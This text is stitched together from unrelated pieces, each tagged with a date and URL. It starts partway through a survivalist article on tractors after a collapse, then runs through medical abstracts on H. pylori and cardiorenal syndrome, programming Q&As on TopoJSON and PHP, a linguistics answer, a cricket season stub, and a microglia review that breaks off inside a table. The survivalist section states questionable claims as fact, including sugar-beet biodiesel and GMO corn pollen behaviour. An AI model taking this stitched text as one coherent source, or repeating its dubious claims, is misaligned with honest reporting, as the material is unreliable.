So even if you do buy a spare tractor, the parts in it may be just as inclined to wear out or break down in the same order as the ones in the tractor you plan to use on a regular basis. In fact, if you buy a tractor that doesn’t run, the part that you need most may be the very one that you already know isn’t working on the spare!
From this perspective, choosing the best parts and tools comes down to researching before you actually buy anything. Once you go through the shop manual, research on consumer forums dedicated to the tractor model that you own. If you see that several people have the same problem, then make sure that you have extra spares for that part, or that you can refurbish what you have.
Be Able to Maintain and Repair On Your Own
Have you ever kept the same vehicle for so long that friends and family members joke that you must have replaced everything but the gas cap?
If so, then you have an idea about what it will be like in the post crisis world where you will have no choice but to patch things, bypass them, or make something new to replace something that fails. You may view this as an educational hobby right now, but these skills will become important.
Here’s what to learn if you plan to maintain and repair your tractor at the highest possible level:
Know how to salvage and repurpose any metal that you happen to come across.
Know how to recognize sources of metal ore and extract it from natural sources.
Know how to mix different ores and minerals to produce a metal suitable for making tractor parts.
Be able to heat, forge, and anneal metals so that you can shape them into usable parts. This includes extruding wire and making precision cuts and holes in any given piece of metal.
Find out more about polymers and other materials that can be stockpiled and used to make prototypes or actual tractor parts. You’ll also find useful to have a 3D printer on hand.
Be able to weld, solder, and manage every other aspect of metal working.
Find ways to melt down plastics or other non-metallic parts so that you can make new items or repair old ones as needed.
Overall, I recommend getting rid of as many computer based or electronic controls in tractors and other vehicles for the sake of EMP proofing and also long term durability. Even though computer chips and solid state devices can go for decades and work perfectly, there will come a day when they stop working.
Unlike purely mechanical devices, there is simply no way to repair a blow IC chip or other solid state part, and all of your efforts will go to waste if you cannot replace these parts with functional new ones. Use your time to make changes that eliminate these devices instead of trying to store them away or figure out how to diagnose them.
Have at Least 3 Safe Storage Locations
No matter how many people die or are wounded when a crisis begin, those left behind will also die off or be injured in large numbers. Before that happens, desperation will drive people to do all kinds of things: joining together to pillage and loot any place that might have food or other important resources.
If you have a tractor and land, sooner or later some kind of rouge element will find its way to your door. From EMP blasts to hostile invaders, you need at least three safe storage locations for your tractors, accessories, and spare parts.
When planning your storage locations:
Try to divide up the items into caches so that anything found at one site is useless unless it is combined with items from 2 or three other locations. For example, if you are storing away engine parts, do not store the tools in the same cache.
It’s best to have underground storage locations since these will be easiest to protect from nuclear radiation. If you are already building a shelter for yourself, you can add on to that shelter more easily than building a structure above ground for the tractor.
The shelters should all be EMP proof.
The shelters should be hard to find from the ground or by land. Learn more about ground penetrating radars as well as how to disguise the tractor signatures as much as possible.
Make sure that all of your caches are easy to defend. Choose areas where you can quickly arm traps as well as areas where you have enough room to lure invaders into fields of fire.
The caches should be far enough apart so that you can get the tractor into them as quickly as possible no matter where you happen to be on the homestead.
Resist the temptation to connect all the caches via underground tunnel. If someone does invade and gets to one of the caches, it will only be a matter of time before they find all of them.
Practice Making Your Own Fuel and Secure Provisions
Regardless of how many ways you modify your tractor to accept different fuels, you need to know how to make them. Make sure that you can produce and store the materials until you are ready to turn them into fuel. For example, if you went ahead and installed a steam engine or a wood burner in the tractor, then make sure you have plenty of trees.
Also if you are going to make biodiesel or some other fuel from natural resources, make sure you can carry out the task for decades or more. Many biodiesel manufacturers today rely on GMO corn.
If you purchase these seeds, it is likely that they will not produce viable seeds for the next season, and the plants that grow from these seeds won’t release pollen that reaches crops earmarked for food. Not only will you lose the capacity to grow corn for biodiesel, but you may also wipe out safe corn for food.
Rather than use GMO seeds, learn how to make biodiesel from sugar beets. There are many heritage strains of this particular plant that can be used for food and biodiesel. As an added bonus, sugar beets usually yield more fuel per acre than you would get from GMO corn.
Once you have all the materials for making fuel in place, make sure that you can store the fuel safely. If you are lucky, you will have one or two crops to harvest per year, and then you will need to make the fuel and store it until more can be made. As with storing the tractor, store fuel tanks underground and in multiple locations.
Know and Practice Making Lubricants
Motor oil, transmission fluid, brake fluid and other maintenance products may become unavailable before conventional fuel stores run out. No matter how many bottles of these materials you store away, they may decay over time or be used up before you were expecting a problem. If your tractor develops oil ring wear and burns more oil, and you cannot replace the ring, your oil stores will go faster than expected.
At least, learn how to strain oil to remove the worst of the debris. Look for oil blends that will not break down as fast as older types. Remember, no matter how much you filter the oil, that does not mean the molecules in the oil have the same capacity to lubricate and remove heat from moving parts.
Overall, you will find it very hard to make a motor oil that will match the characteristics of modern oils. You can still do some research on this topic, as well as the main ingredients found in modern lubricants.
Experiment with different materials to see if you can make something that will last for at least a short time. Look for the best quality oils that last the longest and storing them away for future use. If you can’t find what you need, then mix different products to see if you get something that works better.
Some aspects of preparing your tractor for a major crisis will be easier than others. Set tangible goals for yourself so that you have a functional tractor on hand when you need it, and even if you only accomplish some objectives, it is better than not doing anything at all.
No matter whether you work with a group to divvy up the tasks, or it takes you several years to complete them, you will be taking action that leaves you better prepared for anything that may happen to disrupt your way of life.
This article has been written by Carmela Tyrell for Survivopedia. | 2023-09-26T01:27:15.642919 | https://example.com/article/5391 |
To determine if combined therapy with Peptobismol, amoxycillin and metronidazole will effectively eradicate C. pylori in patients with NUD. | 2023-08-31T01:27:15.642919 | https://example.com/article/8575 |
Q:
TopoJSON: how to calculate scale and translate?
Context:
I'm using the topojson file format along with d3. Since I could not find a library in Python that handles this format, I'm writing one. I've got the topojson to other formats working.
Question:
When converting other formats to topojson, how do I calculate the ideal value for the topojson transforms scale and translate?
In order to save space (among other tricks), the format uses relative integer offsets from the previous point. For example, this is the topojson file for Aruba:
{
"type": "Topology",
"transform": {
"scale": [0.036003600360036005, 0.017361589674592462],
"translate": [-180, -89.99892578124998]
},
"objects": {
"aruba": {
"type": "Polygon",
"arcs": [[0]],
"id": 533
}
},
"arcs": [
[[3058, 5901], [0, -2], [-2, 1], [-1, 3], [-2, 3], [0, 3], [1, 1],
[1, -3], [2, -5], [1, -1]]
]
}
The same information as a GeoJSON feature looks like this:
{
"type" : "Feature",
"id" : 533,
"properties" : {},
"geometry" : {
"type" : "Polygon",
"coordinates" : [[
[-69.9009900990099, 12.451814888520133],
[-69.9009900990099, 12.417091709170947],
[-69.97299729972997, 12.43445329884554],
[-70.00900090009, 12.486538067869319],
[-70.08100810081008, 12.538622836893097],
[-70.08100810081008, 12.590707605916876],
[-70.04500450045005, 12.608069195591469],
[-70.00900090009, 12.55598442656769],
[-69.93699369936994, 12.469176478194726],
[-69.9009900990099, 12.451814888520133]
]]
}
}
It is easy to see how the former is more compact than the later. In order to obtain the absolute coordinates, the function is:
def arc_to_coordinates(topology, arc):
scale = topology['transform']['scale']
translate = topology['transform']['translate']
x = 0
y = 0
coordinates = []
for point in arc:
x += point[0]
y += point[1]
coordinates.append([
x * scale[0] + translate[0],
y * scale[1] + translate[1]
])
return coordinates
Reading topojson is easy enough:
>>> arc_to_coordinates(topology, topology['arcs'][0])
[[-69.9009900990099, 12.451814888520133],
[-69.9009900990099, 12.417091709170947],
[-69.97299729972997, 12.43445329884554],
[-70.00900090009, 12.486538067869319],
[-70.08100810081008, 12.538622836893097],
[-70.08100810081008, 12.590707605916876],
[-70.04500450045005, 12.608069195591469],
[-70.00900090009, 12.55598442656769],
[-69.93699369936994, 12.469176478194726],
[-69.9009900990099, 12.451814888520133]]
Update:
Reading Mike Bostock's code, I saw this:
kx = ((Q - 1) / (x1 - x0)) if x1 - x0 else 1
ky = ((Q - 1) / (y1 - y0)) if y1 - y0 else 1
...
scale = [1/kx, 1/ky]
In the example, given the bounding box in the form (x0, y0, x1, y1), Q seems to be around 6 and 12 for the values [0.036003600360036005, 0.017361589674592462].
>>> x0, y0, x1, y1
(-70.08100810081008, 12.417091709170947, -69.9009900990099, 12.608069195591469)
>>> Q = 6
>>> 1 / ((Q - 1) / (x1 - x0))
0.036003600360035644
>>> Q = 12
>>> 1/ ((Q - 1) / (y1 - y0))
0.017361589674592892
I know the Q has to do with quantization, any idea where the Q values near 6 and 12 came from?
A:
In Python
"Functions that extract GeoJSON-ish data structures from TopoJSON
(https://github.com/mbostock/topojson) topology data.
Author: Sean Gillies (https://github.com/sgillies)"
Example:
from itertools import chain
def rel2abs(arc, scale=None, translate=None):
"""Yields absolute coordinate tuples from a delta-encoded arc.
If either the scale or translate parameter evaluate to False, yield the
arc coordinates with no transformation."""
if scale and translate:
a, b = 0, 0
for ax, bx in arc:
a += ax
b += bx
yield scale[0]*a + translate[0], scale[1]*b + translate[1]
else:
for x, y in arc:
yield x, y
https://github.com/sgillies/topojson/blob/master/topojson.py
| 2023-11-27T01:27:15.642919 | https://example.com/article/5306 |
Q:
Are there any languages with verbs that require more than three arguments?
Are there any languages some of whose verbs require more than three arguments? I was thinking of causative constructions, such that "Mike had John give Sally the ring" could be expressed with one clause.
A:
I have heard the term "tritransitive" for verbs that are said to take four arguments. One example in English is this She(1) bet me(2) ten euros(3) that they won't show up(4). As you can see, this is different from your example with causatives, because the fourth argument taken by the main verb bet is the whole that-clause. If I recall correctly, causative constructions have been analyzed as having only two or exactly three arguments. A problem for the analysis of any construction with regard to argument structure is to determine whether two or more arguments are taken by the same predicate, and thus are coarguments. You need syntactic and semantic evidence to prove that a verb can have four arguments, and as far as I know, causatives are not part of that kind of verbs. I'm sorry I can't tell you anything else about argument structure outside Germanic and Romance linguistics.
| 2024-03-11T01:27:15.642919 | https://example.com/article/9874 |
Introduction
============
*Helicobacter pylori* (*H. pylori*) is a gram-negative bacterium which colonizes and causes chronic infection of stomach (Dunn et al., 1997). Milder form of *H. pylori* infection is gastric mucosal inflammation or gastritis. However, it can eventually lead to more serious conditions such as gastric mucosa--associated lymphoid tissue (MALT) lymphoma, and gastric cancer, which is the third leading cause of cancer deaths according to global cancer statistics in 2018 (McColl, 2010; Srinarong et al., 2014; Vilaichone et al., 2014; Bray et al., 2018; Vilaichone et al., 2018; Poonyam et al., 2019). Host genetic polymorphisms regulating inflammatory response to *H. pylori* infection, along with bacterial virulence and colonization factors play an important role in the pathogenesis of *H. pylori-*related disease (Amieva and El-Omar, 2008). Therefore, host, bacteria and environment integration are factors exerting influence on distinct clinical outcomes between each location (Kuster et al., 2006; Yamaoka and Graham, 2014). Compared to other regions, Asia has the highest incidence and prevalence of gastric cancer accentuating potential health concerns in this area (Rahman et al., 2014).
Kingdom of Bhutan is a landlocked country located in South Asia. Bhutan is bordered by Tibet to its north and west, while India borders its west, east, and south. Considered as one of the countries with the lowest population density, Bhutan has total population of 735,553 per total area of 38,394 square kilometers. The country's geographical features mainly comprise deep valleys and steep mountains with most Himalayan peaks in the north elevated over 7,000 meters above sea level. In this country, cancer is responsible for 10% of all deaths with gastric cancer being the leading cause of cancer mortality. In Bhutan, stomach cancer had the highest incidence of 20.7%, and mortality rate of 23.9% making it the most important disease to focus on (World Health Organization, 2018). Moreover, Bhutan's age-standardized mortality rate of gastric cancer was relatively high as 18.9 per 100,000 compared to 8.2 of global range (International Agency for Research on Cancer, 2018). Persistent *H. pylori* infection is a major risk factor of developing non-cardia gastric cancer (Plummer et al., 2015). The overall prevalence of *H. pylori*infection in Bhutan population was extremely high as 73.4% which could contribute to high gastric cancer incidence in Bhutan (Vilaichone et al., 2013). Therefore, effective *H. pylori* eradication should be taken into consideration for gastric cancer prevention (Mahachai et al., 2016). However, the information about eradication therapy in Bhutan is still lacking.
Until now, the issue about *H. pylori*treatment in Bhutan has not been addressed before. The purpose of this study was to evaluate proper duration of antibiotic treatment for *H. pylori*-infected patients in order to implement the most effective regimen for *H. pylori*eradication in Bhutan population. In this prospective randomized trial, we used triple therapy for 7 or 14 days to eradicate the bacteria. The antimicrobial susceptibility testing was also performed to determine the distribution of antibiotic resistant *H. pylori* strains in Bhutan.
Materials and Methods
=====================
*Patients*
Five hundred and forty-six patients underwent upper GI endoscopy during GASTROCAMP between October 2014 and April 2015 in Bumthang and Haa provinces, Bhutan. A total of 77 patients with dyspepsia residing in the cities named Bumthang and Haa were enrolled in this prospective study. There were 23 males and 54 females with the mean age of 45.4 years. All patients included in this study underwent upper GI endoscopy and were diagnosed with non-ulcer dyspepsia which was defined as normal or mild gastritis. We excluded patients receiving H2 receptor antagonists, proton pump inhibitor (PPI), bismuth compound, and antimicrobial agents within 4 weeks prior to the study, using NSAIDs and anticoagulant, having history of stomach surgery, or having significant comorbidities such as renal failure, advanced cirrhosis, advanced-stage cancer, or cardiac arrhythmia. Special population such as immunocompromised hosts, pregnant women, or breastfeeding women were also excluded. Informed consent was obtained from volunteers at the beginning of the study.
*Sample collection*
All 77 Bhutanese patients in the study underwent upper GI endoscopy and 4 gastric biopsies were obtained for rapid urease test, histopathology, *H. pylori* culture with antimicrobial susceptibility tests (Epsilometer test).
*Rapid urease test*
The test label was peeled off and an antral biopsy was placed in the center of the test well. Then, the test label was resealed and left at room temperature for 60 minutes. If there were *H. pylori* in the tissue specimen, the bacterial urease would convert urea to ammonia and consequently change the pH indicator color from yellow to pink. In this study, all patients with positive rapid urease test were given triple therapy.
*Histopathology*
The gastric biopsies were processed in the embedding and cutting procedure. They were later stained with hematoxylin and eosin. A positive *H. pylori*biopsy sample was defined as a sample with curved rod-shaped bacteria.
*H. pylori culture*
The Eppendorf tubes containing transport media were used for antral biopsy collection. One antral biopsy was minced and mixed in the broth and then streaked on a Mueller Hinton - Agar medium using a sterile heated wire loop. The medium was then put in the candle jar and incubated at 37°C in microaerophilic condition for 3 to 5 days. Colors of *H. pylori* colonies ranged from translucent to pale grey on blood agar. For *H. pylori*detection, gram staining was used and showed small curved gram-negative, rod-shaped bacteria. The biochemical tests including oxidase, catalase, and urease tests were all positive for *H. pylori.*
*Antimicrobial susceptibility testing*
The Epsilometer test (E-test) provides information about antimicrobial susceptibility and determines the minimum inhibitory concentrations (MICs) of antibiotics including amoxicillin (AMX), clarithromycin (CLR), metronidazole (MNZ), tetracycline (TET), and levofloxacin (LVX). The bacteria were inoculated on the plates on which E-test strips with antibacterial agents were placed. Three to five days later, an ellipse became visible. The MIC was defined by the point of intersection between an ellipse and the MIC reading scale which indicated the lowest concentration of antibiotics that was able to inhibit visible bacterial growth. Resistant strains were considered when MIC values were ≥ 0.25 μg/mL for AMX, ≥ 1 μg/mL for CLR, ≥ 8 μg/mL for MNZ, ≥ 1 μg/mL for LVX, and ≥ 4 μg/mL for TET (Mégraud F and Lehours, 2007).
*Therapeutic regimens*
All patients with positive rapid urease test were randomized into 2 groups using a computer-generated list of random numbers to receive either 7-day or 14-day of 500 mg amoxicillin four times daily, 500 mg tetracycline four times daily, and 20 mg omeprazole twice daily.
*Post-therapy follow-up*
*H. pylori* eradication was confirmed by using 13C- urea breath test (13C-UBT) at 4 weeks after completing a course of the triple therapy. 13C-UBT is a non-invasive test determining treatment success by detection of labeled CO~2~ exhaled in a breath sample. If the result showed negative 13C-UBT then the patient was considered achieving successful *H. pylori* eradication (Tongtawee et al., 2014).
*Statistical analysis*
The statistical analysis was performed by using SPSS version 22 (SPSS Inc., Chicago, IL, USA). The demographic data were analysed by unpaired t-test, Fisher's exact test, and Chi-square test where appropriate. Statistical significance was defined as a two-tailed p-value cut point of less than 0.05.
Results
=======
Total of 77 patients were enrolled in the study. The mean age of all patients was 45.4 years with female preponderance (70.1%). Of 77 patients, 52 (67.5%) received 7-day regimen while 25 (32.5%) had 14-day regimen. The majority of patients came from Haa (74.0%), the district in the west of Bhutan while the rest were from Bumthang (26.0%), the district in central region. Every patient in the study had*H. pylori* infection identified by positive rapid urease test and was given either 7-day or 14-day triple therapy. The endoscopic findings of all patients were gastritis. Demographic data including gender, age group, and the study location were demonstrated in [Table 1](#T1){ref-type="table"}.
The *H. pylori* eradication rate of 7-day triple therapy was significantly lower than that of 14-day regimen (51.9% vs. 80.0%, p = 0.02). Classified by gender, 37 of all 54 females received 7-day regimen while 17 received 14-day treatment. However, males in both groups showed relatively low eradication rate with only 66.7% and 50% in 7-day and 14-day triple therapy, respectively. When categorized into two age groups, the successful eradication was observed remarkably higher in patients older than 40 years receiving 14-day therapy compared to 7-day treatment (86.7% vs. 50.0%; p = 0.02). The younger-than-40-year age group also demonstrated the increase in eradication rate from 50% in 7-day therapy to 70% in 14-day therapy but could not reach statistical significance (p = 0.44). Patients receiving 14-day therapy were more likely to have successful eradication than the group receiving 7-day regimen (OR = 3.70; 95%CI 1.21-11.36, p = 0.02). Female and age ≥40 years subgroup also demonstrated significantly higher eradication rate when receiving 14-day compared to 7-day regimen (94.1% vs. 45.9%, OR = 18.82; 95% CI 2.26-157.02, p = 0.0007 and 86.7% vs. 50.0%, OR = 6.50; 95% CI 1.25-33.91, p = 0.02, respectively). The eradication rate and factors affecting on the treatment outcome were shown in [Table 2](#T2){ref-type="table"}. The difference of eradication rate classified by gender and age group was demonstrated in [Figure 1](#F1){ref-type="fig"} and [2](#F2){ref-type="fig"}, respectively.
The gastric biopsies of patients with positive urease test were sent for *H. pylori* culture. Forty-five patients had positive culture (78.9%). Thirty-six patients (80.0%) in the study mainly had metronidazole-resistant strains. Five patients (11.1%) were infected with strains resistant to metronidazole and levofloxacin. Interestingly, no resistance seen in amoxicillin, tetracycline and clarithromycin. There was no difference of antibiotic-resistant strains between genders. The antibiotic susceptibility testing was demonstrated in [Table 3](#T3){ref-type="table"}.
######
Demographic Data
Demography Total (n = 77) 7-day regimen (n = 52) 14-day regimen (n = 25) *P-*value
----------------------- ---------------- ------------------------ ------------------------- -----------
Gender
Men 23 (29.9%) 15 (28.8%) 8 (32.0%) 0.78
Women 54 (70.1%) 37 (71.2%) 17 (68.0%) 0.78
Mean age ± SD (years) 45.4 ± 12.7 45.8 ± 13.8 44.7 ± 10.2 0.74
Range 17 -- 75 17 -- 75 30 -- 61
\< 40 years 30 (40.0%) 20 (40.0%) 10 (40.0%) 1
≥ 40 years 45 (60.0%) 30 (60.0%) 15 (60.0%) 1
{#F1}
{#F2}
######
Effect of Clinical Factors on *H. pylori* Eradication Rate
Factors 7-day regimen 14-day regimen p-value
------------- --------------- ---------------- ---------
Total 27/52 (51.9%) 20/25 (80.0%) 0.02
Gender
Men 10/15 (66.7%) 4/8 (50.0%) 0.66
Women 17/37 (45.9%) 16/17 (94.1%) 0.0007
Age
\< 40 years 10/20 (50.0%) 7/10 (70.0%) 0.44
≥ 40 years 15/30 (50.0%) 13/15 (86.7%) 0.02
######
Antibiotic Susceptibility Testing
Antibiotics Total (n = 45) Male (n = 19) Female (n = 26) *P*-value
----------------------- ---------------- --------------- ----------------- -----------
Antibiotic resistance
-Amoxicillin (AMX) 0 0 0 \-
-Clarithromycin (CLR) 0 0 0 \-
-Metronidazole (MNZ) 36 (80.0%) 15 (78.9%) 21 (80.8%) 1.00
-Tetracycline (TET) 0 0 0 \-
-Levofloxacin (LVX) 5 (11.1%) 2 (10.5%) 3 (11.5%) 1.00
-MNZ and LVX 5 (11.1%) 2 (10.5%) 3 (11.5%) 1.00
Discussion
==========
Bhutan is a small peaceful sovereign state in South Asia located on the eastern edge of the Himalayas. Its landscape ranges from tropical plains in the south to Himalayan forests and mountains in the north. Although the country has been opened to foreigners since 1974, there are still low numbers of international tourists entering the kingdom. In medical field, there has also been a small number of clinical research conducted recently. As cancer incidence in Bhutan has been rising, Bhutan cancer society was founded in 2015 in order to raise awareness of cancer prevention and research. Gastric cancer is the most prevalent cancer in Bhutan and often diagnosed at an advanced stage (Dendup et al., 2015). Chronic *H. pylori* infection was proved to be associated with gastric cancer in many studies (Parsonnet et al., 1991; Vilaichone et al., 2006; Karami et al., 2013). The previous study revealed that the overall prevalence of *H. pylori* infection in Bhutanese population was as high as 73.4% and the rate was even higher in rural areas (Vilaichone et al., 2013). Our study was conducted in rural districts named Haa and Bumthang in which we supposed that the prevalence would be as high as 80-90% as mentioned in two previous studies (Vilaichone et al., 2013; Dorji et al., 2014). The study population was predominantly female (70.1%) and the mean age was 45.4 years which were slightly higher than proportion of females (57.5%) and the mean age (39.6 years) in the prior study (Vilaichone et al., 2013). In our study, all patients with positive urease test were prescribed triple therapy composed of amoxicillin, tetracycline, and omeprazole and scheduled a follow-up visit. Tetracycline was used instead of clarithromycin because tetracycline had a local stock while clarithromycin was not available and had to be imported from India.
Our study demonstrated that 14-day triple therapy had significantly higher *H. pylori* eradication rate (80%) than 7-day regimen (51.9%). In concordance with previous studies and systematic reviews, the duration of triple therapy should be extended to 14 days to improve eradication rate (Yuan et al., 2013; Mahachai et al., 2016). The higher eradication rate of 14-day regimen was also significant in female than male subgroup which might be explained by more severe mucosal inflammation and activity resulting from different level of intramucosal cytokines and genetic expression in men (Kato et al., 2004). Classified by age group, the *H. pylori* eradication rate in older age group was superior to that of the younger generation and significantly improved by using 14-day triple therapy. The previous study in Japan revealed that people in older age group were inclined to achieve more successful eradication because of more prevalent gastric atrophy and acid hyposecretion leading to superior antibiotic response (Mamori et al., 2010). Apart from host factors, bacterial factors such as virulence factor and antibiotic resistance also play important roles in *H. pylori* treatment.
The antimicrobial susceptibility of Bhutanese patients in this study exhibited the strains mostly resistant to metronidazole (80.0%). The metronidazole-resistant rate was approximately the same as 82.9% of previous study conducted in districts of Thimphu, Punaka, and Wangdue of Bhutan (Vilaichone et al., 2013). However, the multidrug-resistant strains (11.1%) were more frequently found in our study than our prior report (2.7%) (Vilaichone et al., 2013). Multidrug-resistant strains isolated in both studies showed resistance to the same types of antibiotics which were metronidazole and fluoroquinolones. Rising numbers of multidrug-resistant strains may be due to increasing antibiotic use. Bhutan's communicable, maternal, perinatal, and nutritional conditions were responsible for 21% of premature deaths which were three times higher than the rate of developed countries. Metronidazole is commonly used for treatment of diarrheal diseases, gynecologic and periodontal infections, whereas levofloxacin is generally used for lower respiratory tract infection. Both gastrointestinal and respiratory infection are major problems in the country and can probably cause an increasing rate of the two most common antibiotic resistance in Bhutan. It can be concluded that metronidazole-based triple therapy should not be used as first-line regimen in the country with high primary metronidazole resistance (Katelaris, 2009). Nevertheless, the previous study in Thailand showed that bismuth-based quadruple therapy containing metronidazole could still be used despite high metronidazole resistance (Vilaichone et al., 2015). Moreover, levofloxacin-based regimen may also have reduced efficacy and cannot be used as a substitute regarding the growing resistant strains to fluoroquinolone (Perna et al., 2007). Since no resistance to amoxicillin, tetracycline, and clarithromycin was noted in our study, these antibiotics can still be used in the first-line treatment for *H. pylori* in Bhutan.
Gastric cancer ranked highest in prevalence, incidence and cancer mortality in Bhutan. Our study suggested that 14-day omeprazole, tetracycline, and 4 times daily dosing of amoxicillin might be an acceptable regimen for *H. pylori* eradication in limited resource area such as Bhutan. This regimen could reduce the risk of developing *H. pylori*-associated diseases especially peptic ulcer with complications and gastric cancer leading to many deaths in Bhutan.
This study was supported by Bualuang ASEAN Chair Professorship at Thammasat University, and Digestive Diseases Research Center (DRC), Thammasat University, Thailand
| 2024-05-17T01:27:15.642919 | https://example.com/article/3374 |
Cardiorenal syndrome type 4: management.
Cardiorenal syndrome (CRS) type 4, or chronic renocardiac syndrome, has been defined as 'chronic abnormalities in renal function leading to cardiac disease' and recognizes the extreme burden of cardiovascular (CV) disease (CVD) risk in patients with chronic kidney disease (CKD). CKD is common and increasingly recognized as a risk factor for CVD. Although during the past 10 years CV morbidity and mortality have decreased markedly in the general population, their rates still remain high among CKD patients. For this reason, CKD patients should be evaluated thoroughly for CV risk factors which require an aggressive management, given the significant implications of CRS type 4 at both individual and societal level. We will review the management of the most important conventional and nonconventional CVD risk factors related to CKD. | 2024-04-30T01:27:15.642919 | https://example.com/article/6940 |
2002–03 Red Stripe Bowl
The 2002–03 Red Stripe Bowl was the 29th edition of what is now the Regional Super50, the domestic limited-overs cricket competition for the countries of the West Indies Cricket Board (WICB). It ran from 14 August to 1 September 2002, with matches played in Jamaica and Saint Lucia.
Ten teams contested the competition, including several first-time participants. For a second consecutive season, the Leeward and Windward Islands teams were each broken up into two teams – Antigua and Barbuda and Saint Vincent and the Grenadines entered separate teams, with players from the remaining countries playing for "Rest of Leeward Islands" and "Rest of Windward Islands" teams. A University of the West Indies team entered for the first time, while Canada were invited as a guest team. The semi-finals and final of the competition were all held in Discovery Bay, Jamaica, with Barbados eventually defeating Jamaica in the final to win their fifth domestic one-day title (and first since the 1987–88 season). Barbadian batsman Floyd Reifer led the tournament in runs, while Merv Dillon of Trinidad and Tobago and Daren Powell of Jamaica were the equal leading wicket-takers.
Squads
Group stage
Zone A
Zone B
Finals
Semi-finals
Final
Statistics
Most runs
The top five run scorers (total runs) are included in this table.
Source: CricketArchive
Most wickets
The top five wicket takers are listed in this table, listed by wickets taken and then by bowling average.
Source: CricketArchive
References
Category:2002 in West Indian cricket
Category:West Indian cricket seasons from 2000–01
Category:Regional Super50 seasons
Category:Domestic cricket competitions in 2002–03 | 2024-07-09T01:27:15.642919 | https://example.com/article/4491 |
Q:
problem with declaring variable in php?
i have a variables like $srange0 , $srange1, $srange2 $srange3.
i am using to declare some value to each value using for loop.
for($i=0;$i<=3;$i++){
$srange.$i = $i;
}
but its not working ?
is there any alternative solution for this
A:
for($i=0;$i<=3;$i++){
$var = 'srange'.$i;
$$var = $i;
}
But, whenever I see variables like that, I'd use an array instead.
| 2023-09-15T01:27:15.642919 | https://example.com/article/3292 |
Since the first description of microglia by Pío del Río Hortega, major advances in understanding their origin, morphological, functional, and genetic aspects were uncovered by pioneering research ([@bibr47-1759091420925335]). Stemming from the predominant focus of the past two decades on the role of microglia in pathological conditions, a passionate debate began to revolve around their function in the homeostatic maintenance of the healthy brain and their phenotypic diversity ([@bibr41-1759091420925335]; [@bibr53-1759091420925335]).
In spite of comprising approximately only 10% of the total central nervous system (CNS) cell population, microglia are found to be extensively, albeit unevenly, distributed throughout the white and gray matter ([@bibr29-1759091420925335]) and are essential for the regulation of complex developmental, homeostatic, and pathological processes ([@bibr41-1759091420925335]). Aside from acting as the CNS innate immune defense system in response to environmental stressors, microglia are known to regulate neuronal development and synaptic plasticity most notably during learning and the adaptation to the environment ([@bibr55-1759091420925335]; [@bibr44-1759091420925335]; [@bibr38-1759091420925335]). Not only are they able to facilitate genesis and maturation of new synapses ([@bibr38-1759091420925335]), considerable data have highlighted several pathways by which microglia mediate synaptic pruning, that is, the elimination of exuberant or dysfunctional synapses. Microglia are able to affect synaptic plasticity through phagocytosis of whole synaptic connections ([@bibr55-1759091420925335]; [@bibr37-1759091420925335]), synaptic "nibbling" (trogocytosis; [@bibr58-1759091420925335]), or physical separation of pre- and postsynaptic elements with the help of their dynamic processes known as synaptic stripping ([@bibr35-1759091420925335]).
Efficient remodeling and refinement of synaptic connections are imperative for adequate brain wiring ([@bibr44-1759091420925335]; [@bibr24-1759091420925335]). Abnormal microglial activity resulting from aging or pathological insults was associated with connectivity issues underlying cognitive impairments and behavioral deviations across models of numerous neurodevelopmental disorders, such as schizophrenia ([@bibr46-1759091420925335]) and autistic spectrum disorders ([@bibr62-1759091420925335]; [@bibr25-1759091420925335]), as well as neurodegenerative diseases such as Alzheimer's disease (AD; [@bibr17-1759091420925335]) and Parkinson's disease (PD; [@bibr30-1759091420925335]).
Expanding literature strongly supports the notion that microglia comprise a heterogenous population with region- and state-specific differences in distribution, morphology, molecular signature, and function across the lifespan ([@bibr15-1759091420925335]; [@bibr53-1759091420925335]). Moreover, in response to specific stimuli and local microenvironment cues, multiple adaptive morphological phenotypes have been described--- from steady-state ramified microglia to amoeboid, hypertrophic, rod-like, and dystrophic/senescent microglia ([@bibr42-1759091420925335]). The concept of microglial heterogeneity has grown over the past years, and several distinctive subpopulations/phenotypes were brought to light by means of state-of-the-art imaging techniques, genetic approaches, or transcriptomic single-cell/bulk RNA analyses. A transient surge of a CD11c+ microglial subpopulation was detected in early postnatal development, supporting neurogenesis and myelination primarily in white matter regions ([@bibr60-1759091420925335]). Comparable on spatiotemporal and functional levels, the proliferative-region-associated microglia subset was described as amoeboid-like shaped and possessing high phagocytic and metabolic activity ([@bibr13-1759091420925335]; [@bibr31-1759091420925335]; [@bibr51-1759091420925335]). It was also shown transcriptionally that proliferative-region-associated microglia significantly overlap with the disease-associated microglia (DAM) subpopulation ([@bibr23-1759091420925335]), whose putative neuroprotective function has been suggested in the early stages of AD ([@bibr7-1759091420925335]). Microglia are no longer considered a homogenous population, and a greater understanding of the mechanisms behind the genesis of their subpopulations and susceptibility toward different phenotypes could hold the key to improve the treatment of neurological disorders.
Discovering the Dark Microglia {#sec2-1759091420925335}
==============================
Microglial heterogeneity is currently experiencing an intellectual boom as novel microglial subpopulations/phenotypes (subtypes) are emerging. One of these are the dark microglia (DM), whose identification, using high-spatial resolution transmission electron microscopy, was based on their unique dark appearance and distinctive ultrastructural features ([@bibr2-1759091420925335]). Although DM research has markedly progressed since their initial discovery (see [Table 1](#table1-1759091420925335){ref-type="table"} for overview), a veil of mystery still covers several key features of these cells, for example, cell-specific markers, origin, and their functionality across disease contexts. For this reason, ultrastructural analysis is presently the most appropriate tool to characterize and study the DM.
######
Summary of the Studies Describing Dark Microglial Cells.
+---------------------------------+----------------------+--------------------------------------------------------------+-----------------------+-------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| | Species | Model | Age at sacrifice | Region | Ultrastructural description |
+=================================+======================+==============================================================+=======================+=================================================================================================+===================================================================================================================================================================================================================+
| ([@bibr2-1759091420925335]) | Mouse | C57BL/6 | 14 months | Hippocampal CA1 | Electron-dense cyto- and nucleoplasm ER and Golgi dilation Altered mitochondria Loss of heterochromatin pattern Processes with acute angles Interaction with synapses Near vasculature elements Highly phagocytic |
| | | | | | |
| | | | | Subgranular layer of the cerebral cortexBasolateral amygdalaMedian eminence of the hypothalamus | |
+---------------------------------+----------------------+--------------------------------------------------------------+-----------------------+-------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| APP^Swe^-PS1ΔE9 | 6, 14, and 21 months | | | | |
+---------------------------------+----------------------+--------------------------------------------------------------+-----------------------+-------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| CX3CR1 KO (with/without stress) | 16--20 weeks | | | | |
